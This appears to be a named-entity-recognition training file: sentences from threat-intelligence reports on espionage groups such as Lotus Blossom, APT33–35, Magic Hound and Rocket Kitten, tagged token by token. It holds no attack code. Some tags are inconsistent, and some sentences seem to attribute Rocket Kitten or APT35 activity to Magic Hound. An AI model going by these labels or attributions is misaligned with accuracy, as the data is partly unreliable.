+diplomat S-IDTY +in O +the O +French O +Ministry O +of O +Foreign O +Affairs O +with O +a O +seemingly O +legitimate O +invitation O +to O +a O +technology O +conference O +in O +Taiwan S-LOC +. O + +Additionally O +, O +the O +targeting O +of O +a O +French B-IDTY +diplomat E-IDTY +based O +in O +Taipei O +, O +Taiwan S-LOC +aligns O +with O +previous O +targeting O +by O +these O +actors S-APT +, O +as O +does O +the O +separate O +infrastructure O +. O + +The O +Elise S-MAL +malware S-MAL +used O +by O +Lotus B-APT +Blossom E-APT +, O +which O +was O +an O +attack B-ACT +campaign E-ACT +on O +targets O +in O +Southeast B-LOC +Asia E-LOC +. O + +Based O +on O +the O +targeting O +and O +lures O +, O +Unit B-SECTEAM +42 E-SECTEAM +assesses O +that O +the O +Lotus B-APT +Blossom I-APT +actors E-APT +' O +collection O +requirements O +include O +militaries S-IDTY +and O +government B-IDTY +agencies E-IDTY +in O +Southeast B-LOC +Asia E-LOC +. 
O + +In O +December B-TIME +2015 E-TIME +, O +Unit B-SECTEAM +42 E-SECTEAM +published O +a O +blog O +about O +a O +cyber B-ACT +espionage I-ACT +attack E-ACT +using O +the O +Emissary B-MAL +Trojan E-MAL +as O +a O +payload O +. O + +The O +oldest O +sample O +we O +found O +was O +created O +in O +2009 S-TIME +, O +indicating O +this O +tool O +has O +been O +in O +use O +for O +almost O +seven O +years O +. O + +In O +addition O +, O +Emissary S-MAL +appears O +to O +against O +Taiwan S-LOC +or O +Hong B-LOC +Kong E-LOC +, O +all O +of O +the O +decoys O +are O +written O +in O +Traditional O +Chinese S-LOC +, O +and O +they O +use O +themes O +related O +to O +the O +government S-IDTY +or O +military S-IDTY +. O + +Of O +note O +, O +this O +is O +three O +years O +earlier O +than O +the O +oldest O +Elise B-MAL +sample E-MAL +we O +have O +found O +, O +suggesting O +this O +group O +has O +been O +active O +longer O +than O +previously O +documented O +. O + +In O +addition O +, O +we O +observed O +a O +TTP O +shift O +post O +publication O +with O +regards O +to O +their O +malware O +delivery O +; O +they O +started O +using O +compromised O +but O +legitimate B-MAL +domains E-MAL +to O +serve O +their O +malware O +. O + +All O +of O +the O +Emissary S-MAL +we've O +collected O +are O +written O +in O +Traditional O +Chinese S-LOC +, O +which O +is O +used O +primarily O +in O +Taiwan S-LOC +and O +Hong B-LOC +Kong E-LOC +. O + +One O +of O +the O +most O +interesting O +observations O +made O +during O +this O +analysis O +is O +that O +the O +amount O +of O +development O +effort O +devoted O +to O +Emissary S-MAL +significantly O +increased O +after O +we O +published O +our O +Operation B-ACT +Lotus I-ACT +Blossom E-ACT +report O +in O +June B-TIME +2015 E-TIME +, O +resulting O +in O +many O +new O +versions O +of O +the O +Emissary B-MAL +Trojan E-MAL +. 
O + +Lotus B-APT +Blossom E-APT +targeted O +the O +government S-IDTY +, O +higher B-IDTY +education E-IDTY +, O +and O +high B-IDTY +tech I-IDTY +companies E-IDTY +. O + +Our O +evidence O +suggests O +that O +malware O +authors O +created O +Emissary S-MAL +as O +early O +as O +2009 S-TIME +, O +which O +suggests O +that O +threat O +actors S-APT +have O +relied O +on O +this O +tool O +as O +a O +payload O +in O +cyber-espionage B-ACT +attacks E-ACT +for O +many O +years O +. O + +While O +it O +lacks O +more O +advanced O +functionality O +like O +screen O +capturing O +, O +it O +is O +still O +able O +to O +carry O +out O +most O +tasks O +desired O +by O +threat O +actors S-APT +: O +Exfiltration S-ACT +of O +files O +, O +ability O +to O +download O +and O +execute O +additional O +payloads O +, O +and O +gain O +remote O +shell O +access O +. O + +The O +timeline O +in O +Figure O +2 O +shows O +that O +the O +Emissary B-MAL +Trojan E-MAL +was O +first O +created O +( O +version O +1.0 O +) O +in O +May B-TIME +2009 E-TIME +and O +quickly O +received O +an O +update O +that O +resulted O +in O +version O +1.1 O +in O +June B-TIME +2009 E-TIME +. O + +Between O +August S-TIME +and O +November B-TIME +2015 E-TIME +the O +malware O +author O +creates O +several O +new O +versions O +of O +Emissary S-MAL +, O +specifically O +5.0 O +, O +5.1 O +, O +5.3 O +and O +5.4 O +in O +a O +much O +more O +rapid O +succession O +compared O +to O +development O +process O +in O +earlier O +versions O +. O + +Version O +2.0 O +received O +one O +update O +in O +October B-TIME +2013 E-TIME +before O +the O +malware O +author O +released O +version O +3.0 O +in O +December B-TIME +2014 E-TIME +. 
O + +While O +this O +may O +be O +coincidental O +, O +the O +out-of-sequence O +version O +3.0 O +sample O +was O +created O +ten O +days O +after O +we O +published O +the O +Operation B-ACT +Lotus I-ACT +Blossom E-ACT +paper O +that O +exposed O +the O +Elise B-MAL +Trojan E-MAL +that O +is O +closely O +related O +to O +Emissary S-MAL +. O + +The O +Lotus B-APT +Blossom E-APT +largely O +targets O +military S-IDTY +or O +government S-IDTY +, O +with O +some O +cases O +of O +higher B-IDTY +education E-IDTY +and O +high B-IDTY +tech I-IDTY +companies E-IDTY +. O + +The O +use O +of O +Emissary S-MAL +appears O +to O +be O +focused O +only O +on O +Taiwan S-LOC +and O +Hong B-LOC +Kong E-LOC +, O +with O +regular O +malware O +updates O +to O +avoid O +detection O +and O +to O +increase O +the O +odds O +of O +success O +. O + +The O +Lotus B-APT +Blossom I-APT +actors E-APT +using O +Emissary S-MAL +have O +been O +active O +for O +at O +least O +seven O +years O +in O +Southeast B-LOC +Asia E-LOC +. O + +Magic O +Hound O +has O +primarily O +targeted O +organizations O +in O +the O +energy S-IDTY +, O +government S-IDTY +, O +and O +technology B-IDTY +sectors E-IDTY +that O +are O +either O +based O +or O +have O +business O +interests O +in O +Saudi B-LOC +Arabia E-LOC +. O + +Regardless O +of O +causation O +, O +the O +rapid O +development O +of O +new O +versions O +of O +Emissary S-MAL +suggests O +that O +the O +malware O +authors O +are O +making O +frequent O +modifications O +to O +evade O +detection O +, O +which O +as O +a O +corollary O +suggests O +the O +Lotus B-APT +Blossom E-APT +are O +actively O +using O +the O +Emissary B-MAL +Trojan E-MAL +as O +a O +payload O +in O +attacks O +. 
O + +Link O +analysis O +of O +infrastructure O +and O +tools O +also O +revealed O +a O +potential O +relationship O +between O +Magic O +Hound O +and O +the O +adversary O +group O +called O +" O +Rocket B-APT +Kitten E-APT +" O +( O +AKA O +Operation B-APT +Saffron I-APT +Rose E-APT +, O +Ajax B-APT +Security I-APT +Team E-APT +, O +Operation B-APT +Woolen-Goldfish E-APT +) O +as O +well O +as O +an O +older O +attack B-ACT +campaign E-ACT +called O +Newscasters O +. O + +In O +addition O +to O +the O +malware O +evolution O +, O +the O +actors S-APT +also O +shifted O +from O +solely O +spear-phishing S-ACT +targets O +with O +attachments O +to O +also O +compromising O +legitimate O +websites O +to O +host O +malware O +. O + +It O +is O +highly O +likely O +the O +Lotus B-APT +Blossom E-APT +used O +spear-phishing S-ACT +attacks E-ACT +containing O +links O +to O +these O +malicious O +documents O +as O +a O +delivery O +mechanism O +. O + +We O +were O +ultimately O +able O +to O +identify O +multiple O +organizations O +in O +the O +government S-IDTY +, O +energy S-IDTY +, O +and O +technology B-IDTY +sectors E-IDTY +targeted O +by O +Magic O +Hound O +. O + +The O +Magic B-ACT +Hound I-ACT +attacks E-ACT +did O +not O +rely O +on O +exploit S-VULNAME +code O +to O +compromise O +targeted O +systems O +, O +instead O +relying O +on O +Excel S-ACT +and O +Word B-ACT +documents E-ACT +containing O +malicious O +macros O +. O + +The O +MPK B-MAL +bot E-MAL +is O +not O +publicly O +available O +and O +had O +previously O +been O +attributed O +to O +an O +adversary O +group O +called O +" O +Rocket B-APT +Kitten E-APT +" O +which O +has O +often O +been O +thought O +to O +be O +a O +state O +sponsored O +adversary O +operating O +in O +the O +Middle B-LOC +East E-LOC +region O +. O + +One O +payload O +was O +a O +Python S-TOOL +based O +open O +source O +remote B-MAL +administration I-MAL +tool E-MAL +( O +RAT S-MAL +) O +called O +Pupy S-MAL +. 
O + +The O +Magic B-ACT +Hound I-ACT +campaign E-ACT +used O +Word S-ACT +and O +Excel S-ACT +documents O +containing O +malicious O +macros O +as O +a O +delivery O +method O +, O +specifically O +attempting O +to O +load O +MagicHound.Rollover S-MAL +. O + +Many O +of O +the O +Fetch O +samples O +we O +analyzed O +attempted O +to O +obfuscate O +their O +functionality O +by O +encrypting O +their O +embedded O +strings O +using O +AES S-MAL +. O + +The O +loader O +'s O +main O +goal O +was O +to O +run O +a O +PowerShell B-MAL +command E-MAL +to O +execute O +shellcode O +. O + +To O +set O +up O +persistence O +, O +the O +loader O +writes O +a O +file O +to O +" O +c:\temp\rr.exe S-FILE +" O +and O +executes O +it O +with O +specific O +command O +line O +arguments O +to O +create O +auto O +run O +registry O +keys O +. O + +The O +Magic B-ACT +Hound I-ACT +campaign E-ACT +was O +also O +discovered O +using O +a O +custom B-MAL +dropper E-MAL +tool O +, O +which O +we O +have O +named O +MagicHound.DropIt S-FILE +. O + +We O +have O +also O +seen O +Magic O +Hound O +using O +DropIt S-MAL +as O +a O +binder O +, O +specifically O +dropping O +a O +legitimate O +decoy O +executable O +along O +with O +the O +malicious O +executable O +onto O +the O +target O +host O +. O + +We O +also O +found O +a O +second O +IRC B-MAL +bot E-MAL +called O +MPK S-MAL +using O +the O +same O +IP S-PROT +for O +its O +C2 S-TOOL +server O +that O +a O +Leash B-MAL +sample E-MAL +was O +hosted O +on O +. O + +The O +Magic B-ACT +Hound I-ACT +attack I-ACT +campaign E-ACT +is O +an O +active O +and O +persistent O +espionage S-ACT +motivated O +adversary O +operating O +in O +the O +Middle B-LOC +East E-LOC +region O +. 
O + +Organizations O +in O +the O +government S-IDTY +, O +energy S-IDTY +, O +and O +technology B-IDTY +sectors E-IDTY +have O +been O +targeted O +by O +Magic O +Hound O +, O +specifically O +organizations O +based O +in O +or O +doing O +business O +in O +Saudi B-LOC +Arabia E-LOC +. O + +At O +a O +high O +level O +, O +Retriever S-MAL +is O +a O +.NET B-MAL +downloader E-MAL +that O +downloads O +secondary O +payloads O +from O +servers O +associated O +with O +Magic O +Hound O +. O + +For O +example O +, O +we O +analyzed O +a O +DropIt B-MAL +sample E-MAL +( O +SHA256 S-ENCR +: O +cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 S-SHA2 +) O +that O +dropped O +two O +executables O +, O +one O +of O +which O +was O +saved O +to O +" O +%TEMP%\flash_update.exe S-FILE +" O +that O +was O +a O +legitimate O +Flash B-MAL +Player I-MAL +installer E-MAL +. O + +M-Trends S-SECTEAM +2018 S-TIME +can O +arm O +security O +teams O +with O +the O +knowledge O +they O +need O +to O +defend O +against O +today O +'s O +most O +often O +used O +cyber B-ACT +attacks E-ACT +, O +as O +well O +as O +lesser O +seen O +and O +emerging O +threats O +. O + +FireEye S-SECTEAM +tracks O +thousands O +of O +threat O +actors S-APT +, O +but O +pays O +special O +attention O +to O +state-sponsored O +attackers S-APT +who O +carry O +out O +advanced O +persistent O +threat O +( O +APT O +) O +attacks O +. O + +Since O +at O +least O +2014 S-TIME +, O +APT32 S-APT +, O +also O +known O +as O +the O +OceanLotus B-APT +Group E-APT +, O +has O +targeted O +foreign B-IDTY +corporations E-IDTY +with O +investments O +in O +Vietnam S-LOC +, O +foreign B-IDTY +governments E-IDTY +, O +journalists S-IDTY +, O +and O +Vietnamese S-LOC +dissidents S-IDTY +. 
O + +During O +a O +recent O +campaign O +, O +APT32 S-APT +leveraged O +social B-ACT +engineering E-ACT +emails S-TOOL +with O +Microsoft B-FILE +ActiveMime I-FILE +file E-FILE +attachments O +to O +deliver O +malicious O +macros O +. O + +Evidence O +also O +suggests O +that O +APT32 S-APT +has O +targeted O +network B-IDTY +security E-IDTY +and O +technology B-IDTY +infrastructure I-IDTY +corporations E-IDTY +with O +connections O +to O +foreign O +investors O +. O + +Since O +at O +least O +2014 S-TIME +, O +APT32 S-APT +, O +also O +known O +as O +the O +OceanLotus B-APT +Group E-APT +, O +has O +targeted O +foreign B-IDTY +corporations E-IDTY +foreign O +governments S-IDTY +. O + +FireEye S-SECTEAM +asesses O +that O +APT32 B-APT +actors E-APT +may O +be O +aligned O +with O +the O +national O +interests O +of O +Vietnam S-LOC +. O + +APT32 S-APT +poses O +a O +threat O +to O +companies O +doing O +business O +or O +preparing O +to O +invest O +in O +Vietnam S-LOC +. O + +We O +believe O +recent O +activity O +targeting O +private O +interests O +in O +Vietnam S-LOC +suggests O +that O +APT32 S-APT +poses O +a O +threat O +to O +companies O +doing O +business O +or O +preparing O +to O +invest O +in O +the O +country O +. O + +DROPSHOT S-MAL +is O +a O +notable O +piece O +of O +malware S-MAL +used O +to O +deliver O +variants O +of O +the O +TURNEDUP O +backdoor O +. O + +Additionally O +, O +there O +is O +evidence O +to O +suggest O +APT33 S-APT +targeted O +Saudi B-LOC +Arabia E-LOC +. O + +APT33 S-APT +often O +conducts O +spear-phishing S-ACT +operations O +using O +a O +built-in O +phishing B-ACT +module E-ACT +. O + +Additionally O +, O +there O +is O +evidence O +to O +suggest O +APT33 S-APT +targeted O +Saudi B-LOC +Arabian E-LOC +and O +Western S-LOC +organizations O +that O +provide O +training O +, O +maintenance O +and O +support O +for O +Saudi B-LOC +Arabia E-LOC +'s O +military S-IDTY +and O +commercial S-IDTY +fleets O +. 
O + +Although O +we O +have O +only O +observed O +APT33 S-APT +use O +DROPSHOT S-MAL +to O +deliver O +TURNEDUP O +, O +we O +have O +identified O +multiple O +DROPSHOT B-MAL +samples E-MAL +in O +the O +wild O +that O +delivered O +wiper O +malware O +we O +call O +SHAPESHIFT S-MAL +. O + +The O +SHAPESHIFT B-MAL +wiper E-MAL +is O +capable O +of O +wiping O +disks O +and O +volumes O +, O +as O +well O +as O +deleting O +files O +. O + +Ties O +to O +SHAPESHIFT S-MAL +suggest O +that O +APT33 S-APT +may O +engage O +in O +destructive O +operations O +or O +shares O +tools O +or O +development O +resources O +with O +an O +Iranian S-LOC +threat O +group O +that O +conducts O +destructive O +operations O +. O + +In O +a O +recent O +attack O +, O +APT33 S-APT +sent O +spear-phishing S-ACT +emails S-TOOL +to O +workers O +in O +the O +aviation B-IDTY +industry E-IDTY +. O + +The O +HTA B-FILE +files E-FILE +contained O +job O +descriptions O +and O +links O +to O +job O +postings O +on O +popular O +employment O +websites O +. O + +Since O +at O +least O +2014 S-TIME +, O +an O +Iranian S-LOC +threat O +group O +tracked O +by O +FireEye S-SECTEAM +as O +APT34 S-APT +has O +conducted O +reconnaissance O +aligned O +with O +the O +strategic O +interests O +of O +Iran S-LOC +. O + +These O +emails S-TOOL +included O +recruitment-themed B-ACT +lures E-ACT +and O +links O +to O +malicious O +HTML B-TOOL +Application E-TOOL +files O +. O + +The O +OilRig B-APT +group E-APT +conducts O +operations O +primarily O +in O +the O +Middle B-LOC +East E-LOC +, O +targeting O +financial S-IDTY +, O +government S-IDTY +, O +energy S-IDTY +, O +chemical S-IDTY +, O +telecommunications S-IDTY +and O +other O +industries O +. O + +APT34 S-APT +uses O +a O +mix O +of O +public B-MAL +and I-MAL +non-public I-MAL +tools E-MAL +. O + +APT34 S-APT +often O +uses O +compromised B-MAL +accounts E-MAL +to O +conduct O +spear-phishing S-ACT +operations O +. 
O + +APT33 S-APT +leverages O +a O +mix O +of O +public B-MAL +and I-MAL +non-public I-MAL +tools E-MAL +and O +often O +conducts O +spear-phishing S-ACT +operations O +using O +a O +built-in O +phishing B-ACT +module E-ACT +from O +" O +ALFA B-MAL +TEaM I-MAL +Shell E-MAL +" O +, O +a O +publicly B-MAL +available I-MAL +web I-MAL +shell E-MAL +. O + +In O +July B-TIME +2017 E-TIME +, O +FireEye S-SECTEAM +observed O +APT34 S-APT +targeting O +an O +organization O +in O +the O +Middle B-LOC +East E-LOC +using O +the O +POWRUNER B-MAL +PowerShell-based I-MAL +backdoor E-MAL +and O +the O +downloader O +BONDUPDATER S-MAL +. O + +POWRUNER S-MAL +was O +delivered O +using O +a O +malicious O +RTF B-FILE +file E-FILE +that O +exploited O +CVE-2017-0199 S-VULID +. O + +In O +November B-TIME +2017 E-TIME +, O +APT34 S-APT +leveraged O +the O +Microsoft B-TOOL +Office E-TOOL +vulnerability O +CVE-2017-11882 S-VULID +to O +deploy O +POWRUNER S-MAL +and O +BONDUPDATER S-MAL +less O +than O +a O +week O +after O +Microsoft S-IDTY +issued O +a O +patch O +. O + +FireEye S-SECTEAM +has O +identified O +APT35 S-APT +operations O +dating O +back O +to O +2014 S-TIME +. O + +APT35 S-APT +, O +also O +known O +as O +the O +Newscaster B-APT +Team E-APT +, O +is O +a O +threat O +group O +sponsored O +by O +the O +Iranian S-LOC +government O +that O +conducts O +long O +term O +, O +resource-intensive O +operations O +to O +collect O +strategic O +intelligence O +. O + +APT35 S-APT +typically O +targets O +military S-IDTY +, O +diplomatic S-IDTY +and O +government S-IDTY +, O +media S-IDTY +, O +energy S-IDTY +, O +engineering S-IDTY +, O +business B-IDTY +services E-IDTY +and O +telecommunications B-IDTY +sectors E-IDTY +in O +U.S. S-LOC +and O +the O +Middle B-LOC +East E-LOC +. O + +APT35 S-APT +has O +historically O +used O +unsophisticated B-MAL +tools E-MAL +like O +those O +listed O +below O +in O +Figure O +3 O +. O + +APT35 S-APT +typically O +targets O +U.S. 
S-LOC +and O +the O +Middle B-LOC +Eastern E-LOC +military S-IDTY +, O +diplomatic S-IDTY +and O +government B-IDTY +personnel E-IDTY +, O +organizations S-IDTY +in O +the O +media S-IDTY +, O +energy S-IDTY +and O +defense B-IDTY +industrial I-IDTY +base E-IDTY +( O +DIB S-IDTY +) O +, O +and O +engineering S-IDTY +, O +business B-IDTY +services E-IDTY +and O +telecommunications B-IDTY +sectors E-IDTY +. O + +Many O +of O +the O +fake O +personas O +utilized O +by O +APT35 S-APT +claimed O +to O +be O +part O +of O +news B-IDTY +organizations E-IDTY +, O +which O +led O +to O +APT35 S-APT +being O +referred O +to O +as O +the O +Newscaster B-APT +Team E-APT +. O + +Since O +at O +least O +2013 S-TIME +, O +the O +Iranian S-LOC +threat O +group O +that O +FireEye S-SECTEAM +tracks O +as O +APT33 S-APT +has O +carried O +out O +a O +Cyber B-ACT +Espionage E-ACT +operation O +to O +collect O +information O +from O +defense S-IDTY +, O +aerospace S-IDTY +and O +petrochemical B-IDTY +organizations E-IDTY +. O + +Since O +at O +least O +2013 S-TIME +, O +the O +Iranian S-LOC +threat O +group O +FireEye S-SECTEAM +tracks O +as O +APT33 S-APT +has O +carried O +out O +a O +Cyber B-ACT +Espionage E-ACT +operation O +to O +collect O +information O +from O +defense S-IDTY +, O +aerospace S-IDTY +and O +petrochemical B-IDTY +organizations E-IDTY +. O + +In O +early B-TIME +2017 E-TIME +, O +Mandiant S-SECTEAM +responded O +to O +an O +incident O +involving O +APT35 S-APT +targeting O +an O +energy B-IDTY +company E-IDTY +. O + +The O +attacker S-APT +used O +a O +spear-phishing S-ACT +email E-ACT +containing O +a O +link O +to O +a O +fake O +resume O +hosted O +on O +a O +legitimate O +website O +that O +had O +been O +compromised O +. O + +APT35 S-APT +also O +installed O +BROKEYOLK O +, O +a O +custom B-MAL +backdoor E-MAL +, O +to O +maintain O +persistence O +on O +the O +compromised O +host O +. 
O + +They O +then O +proceeded O +to O +log O +directly O +into O +the O +VPN S-TOOL +using O +the O +credentials B-MAL +of I-MAL +the I-MAL +compromised I-MAL +user E-MAL +. O + +The O +resume O +contained O +the O +PupyRAT B-MAL +backdoor E-MAL +, O +which O +communicated O +with O +known O +APT35 S-APT +infrastructure O +. O + +Once O +connected O +to O +the O +VPN S-TOOL +, O +APT35 S-APT +focused O +on O +stealing O +domain O +credentials O +from O +a O +Microsoft S-IDTY +Active O +Directory O +Domain O +Controller O +to O +allow O +them O +to O +authenticate O +to O +the O +single-factor O +VPN S-TOOL +and O +Office O +365 O +instance O +. O + +While O +having O +access O +to O +the O +organization O +'s O +environment O +, O +the O +Magic O +Hound O +targeted O +data O +related O +to O +entities O +in O +the O +Middle B-LOC +East E-LOC +. O + +Mandiant S-SECTEAM +has O +previously O +observed O +targeted O +attackers S-APT +stealing O +email S-TOOL +, O +but O +few O +threat O +actors S-APT +have O +been O +as O +successful O +at O +this O +as O +APT35 S-APT +. O + +The O +campaigns S-ACT +delivered O +PupyRAT S-MAL +, O +an O +open-source O +cross-platform O +remote B-MAL +access I-MAL +trojan E-MAL +( O +RAT S-MAL +) O +. O + +Ultimately O +, O +APT35 S-APT +had O +used O +access O +to O +hundreds O +of O +mailboxes O +to O +read O +email B-IDTY +communications E-IDTY +and O +steal O +data O +related O +to O +Middle B-LOC +East E-LOC +organizations O +, O +which O +later O +became O +victims O +of O +destructive B-ACT +attacks E-ACT +. O + +CTU S-SECTEAM +researchers O +observed O +likely O +unsuccessful O +phishing B-ACT +campaigns E-ACT +being O +followed O +by O +highly O +targeted O +spearphishing S-ACT +and O +social B-ACT +engineering I-ACT +attacks E-ACT +from O +a O +threat O +actor O +using O +the O +name O +Mia B-APT +Ash E-APT +. 
O + +Further O +analysis O +revealed O +a O +well-established O +collection O +of O +fake O +social B-IDTY +media E-IDTY +profiles O +that O +appear O +intended O +to O +build O +trust O +and O +rapport O +with O +potential O +victims O +. O + +COBALT B-APT +GYPSY E-APT +has O +used O +spearphishing S-ACT +to O +target O +telecommunications S-IDTY +, O +government S-IDTY +, O +defense S-IDTY +, O +oil S-IDTY +, O +and O +financial B-IDTY +services I-IDTY +organizations E-IDTY +based O +in O +or O +affiliated O +with O +the O +MENA S-LOC +region O +, O +identifying O +individual B-IDTY +victims E-IDTY +through O +social B-IDTY +media E-IDTY +sites O +. O + +The O +connections O +associated O +with O +these O +profiles O +indicate O +the O +threat O +actor O +began O +using O +the O +persona O +to O +target O +organizations O +in O +April B-TIME +2016 E-TIME +. O + +Between O +December B-TIME +28 I-TIME +, I-TIME +2016 E-TIME +and O +January B-TIME +1 I-TIME +, I-TIME +2017 E-TIME +, O +CTU S-SECTEAM +researchers O +observed O +a O +phishing B-ACT +campaign E-ACT +targeting O +Middle B-LOC +Eastern E-LOC +organizations O +. O + +The O +macro O +ran O +a O +PowerShell B-MAL +command E-MAL +that O +attempted O +to O +download O +additional O +PowerShell S-TOOL +loader O +scripts O +for O +PupyRAT S-MAL +, O +a O +research B-MAL +and I-MAL +penetration-testing I-MAL +tool E-MAL +that O +has O +been O +used O +in O +attacks O +. O + +The O +survey O +contained O +macros O +that O +, O +once O +enabled O +, O +downloaded O +PupyRAT S-MAL +. O + +CTU S-SECTEAM +researchers O +determined O +that O +the O +COBALT B-APT +GYPSY E-APT +threat O +group O +orchestrated O +this O +activity O +due O +to O +the O +tools O +, O +techniques O +, O +and O +procedures O +( O +TTPs O +) O +used O +in O +both O +campaigns S-ACT +. 
O + +The O +Magic O +Hound O +has O +repeatedly O +used O +social B-IDTY +media E-IDTY +to O +identify O +and O +interact O +with O +employees S-IDTY +at O +targeted O +organizations O +and O +then O +used O +weaponized O +Excel B-ACT +documents E-ACT +. O + +The O +group O +has O +repeatedly O +used O +social B-IDTY +media E-IDTY +, O +particularly O +LinkedIn O +, O +to O +identify O +and O +interact O +with O +employees O +at O +targeted O +organizations O +, O +and O +then O +used O +weaponized O +Excel B-ACT +documents E-ACT +to O +deliver O +RATs S-MAL +such O +as O +PupyRAT S-MAL +. O + +By O +compromising B-ACT +a I-ACT +user I-ACT +account E-ACT +that O +has O +administrative O +or O +elevated O +access O +, O +Magic O +Hound O +can O +quickly O +access O +a O +targeted O +environment O +to O +achieve O +their O +objectives O +. O + +These O +characteristics O +suggest O +that O +COBALT B-APT +GYPSY E-APT +executed O +the O +January S-TIME +and O +February S-TIME +phishing B-ACT +campaigns E-ACT +and O +that O +it O +created O +the O +Mia B-APT +Ash E-APT +persona O +. O + +CTU S-SECTEAM +researchers O +have O +observed O +multiple O +COBALT B-ACT +GYPSY I-ACT +campaigns E-ACT +since O +2015 S-TIME +and O +consider O +it O +highly O +likely O +that O +the O +group O +is O +associated O +with O +Iranian S-LOC +government-directed O +cyber O +operations O +. O + +The O +use O +of O +the O +Mia B-MAL +Ash E-MAL +persona O +demonstrates O +the O +creativity O +and O +persistence O +that O +threat O +actors S-APT +employ O +to O +compromise O +targets O +. O + +CTU S-SECTEAM +researchers O +conclude O +that O +COBALT B-APT +GYPSY E-APT +created O +the O +persona O +to O +gain O +unauthorized O +access O +to O +targeted O +computer O +networks O +via O +social B-IDTY +engineering E-IDTY +. 
O + +The O +persistent O +use O +of O +social B-IDTY +media E-IDTY +to O +identify O +and O +manipulate O +victims O +indicates O +that O +COBALT B-APT +GYPSY E-APT +successfully O +achieves O +its O +objectives O +using O +this O +tactic O +. O + +COBALT B-APT +GYPSY E-APT +'s O +continued O +social B-IDTY +media E-IDTY +use O +reinforces O +the O +importance O +of O +recurring O +social B-IDTY +engineering E-IDTY +training O +. O + +SecureWorks B-SECTEAM +Counter I-SECTEAM +Threat I-SECTEAM +Unit E-SECTEAM +( O +CTU S-SECTEAM +) O +researchers O +analyzed O +a O +phishing B-ACT +campaign E-ACT +that O +targeted O +a O +Middle B-LOC +Eastern E-LOC +organization S-IDTY +in O +early B-TIME +January I-TIME +2017 E-TIME +. O + +SecureWorks® B-SECTEAM +Counter I-SECTEAM +Threat I-SECTEAM +Unit™ E-SECTEAM +( O +CTU S-SECTEAM +) O +researchers O +analyzed O +a O +phishing B-ACT +campaign E-ACT +that O +targeted O +a O +Middle B-LOC +Eastern E-LOC +organization S-IDTY +in O +early B-TIME +January I-TIME +2017 E-TIME +. O + +CTU S-SECTEAM +analysis O +suggests O +this O +activity O +is O +related O +to O +Iranian S-LOC +threat O +actors S-APT +closely O +aligned O +with O +or O +acting O +on O +behalf O +of O +the O +COBALT B-APT +GYPSY E-APT +threat O +group O +( O +formerly O +labeled O +Threat B-APT +Group-2889 E-APT +) O +. O + +Since O +early B-TIME +2014 E-TIME +, O +an O +attacker O +group O +of O +Iranian S-LOC +origin O +has O +been O +actively O +targeting O +persons O +of O +interest O +by O +means O +of O +malware O +infection O +, O +supported O +by O +persistent O +spear B-ACT +phishing I-ACT +campaigns E-ACT +. O + +This O +cyber-espionage S-ACT +group O +was O +dubbed O +' O +Rocket B-APT +Kitten E-APT +' O +, O +and O +remains O +active O +as O +of O +this O +writing O +, O +with O +reported O +attacks O +as O +recent O +as O +October B-TIME +2015 E-TIME +. 
O + +Characterized O +by O +relatively O +unsophisticated B-MAL +technical I-MAL +merit E-MAL +and O +extensive O +use O +of O +spear B-ACT +phishing E-ACT +, O +the O +Magic O +Hound O +targeted O +individuals O +and O +organizations O +in O +the O +Middle B-LOC +East E-LOC +( O +including O +targets O +inside O +Iran S-LOC +itself O +) O +, O +as O +well O +as O +across O +Europe S-LOC +and O +in O +the O +United B-LOC +States E-LOC +. O + +The O +May B-TIME +2014 E-TIME +' O +Operation B-ACT +Saffron I-ACT +Rose E-ACT +' O +publication O +identifies O +an O +Iranian S-LOC +hacking O +group O +formerly O +named O +' O +Ajax B-APT +Security E-APT +' O +( O +code-named O +' O +Flying B-APT +Kitten E-APT +' O +by O +CrowdStrike S-SECTEAM +) O +engaged O +in O +active O +spear B-ACT +phishing I-ACT +attacks E-ACT +on O +Iranian S-LOC +dissidents S-IDTY +( O +those O +attempting O +to O +circumvent O +government O +traffic O +monitoring O +) O +. O + +An O +Iranian S-LOC +hacking O +group O +formerly O +named O +Ajax B-APT +Security E-APT +( O +code-named O +' O +Flying B-APT +Kitten E-APT +' O +by O +CrowdStrike S-SECTEAM +) O +engaged O +in O +active O +spear B-ACT +phishing I-ACT +attacks E-ACT +on O +Iranian S-LOC +dissidents S-IDTY +( O +those O +attempting O +to O +circumvent O +government O +traffic O +monitoring O +) O +. O + +The O +report O +specifies O +the O +Magic O +Hound O +targeted O +political S-IDTY +, O +military S-IDTY +and O +defense B-IDTY +industry E-IDTY +in O +the O +US S-LOC +, O +UK S-LOC +and O +Israel S-LOC +. O + +ClearSky S-SECTEAM +'s O +September B-TIME +2014 E-TIME +blog O +post O +first O +described O +active O +attacks O +using O +a O +piece O +of O +malware O +they O +dubbed O +' O +Gholee S-MAL +' O +( O +as O +appears O +in O +a O +malicious O +payload O +export O +function O +, O +potentially O +named O +after O +a O +popular O +Iranian S-LOC +singer9 O +) O +. 
O + +The O +Rocket B-APT +Kitten E-APT +attacker O +group O +'s O +main O +attack O +vector O +is O +spear-phishing S-ACT +. O + +After O +learning O +of O +an O +active O +attack O +incident O +from O +the O +Rocket B-APT +Kitten I-APT +group E-APT +on O +a O +customer O +network O +, O +Check B-SECTEAM +Point E-SECTEAM +researchers O +decided O +to O +actively O +join O +the O +investigation O +. O + +As O +described O +in O +previous O +publications O +, O +the O +Rocket B-APT +Kitten E-APT +attackers S-APT +make O +extensive O +use O +of O +various O +phishing S-ACT +schemes O +. O + +While O +the O +recent O +paper O +from O +Trend B-SECTEAM +Micro E-SECTEAM +and O +ClearSky S-SECTEAM +( O +' O +The O +Spy B-APT +Kittens E-APT +Are O +Back O +: O +Rocket B-APT +Kitten E-APT +2 O +' O +) O +does O +extensively O +cover O +the O +campaign O +'s O +narrative O +, O +we O +aimed O +to O +seek O +confirmation O +that O +our O +analyzed O +attack O +was O +positively O +connected O +to O +the O +same O +campaign O +and O +set O +out O +to O +provide O +additional O +value O +and O +insight O +. O + +As O +the O +Rocket B-APT +Kitten I-APT +group E-APT +'s O +behavior O +was O +well O +characterized O +in O +previous O +publications O +( O +see O +the O +recent O +report O +from O +Trend B-SECTEAM +Micro E-SECTEAM +and O +ClearSky S-SECTEAM +) O +. O + +Magic O +Hound O +will O +often O +find O +simpler O +ACTs O +for O +effective O +compromise O +, O +such O +as O +creative O +phishing S-ACT +and O +simple O +custom B-ACT +malware E-ACT +. O + +We O +present O +the O +connection O +between O +Behzad B-APT +Mesri E-APT +, O +an O +Iranian S-LOC +national O +recently O +indicted O +for O +his O +involvement O +in O +hacking O +HBO O +, O +and O +Charming B-APT +Kitten E-APT +. 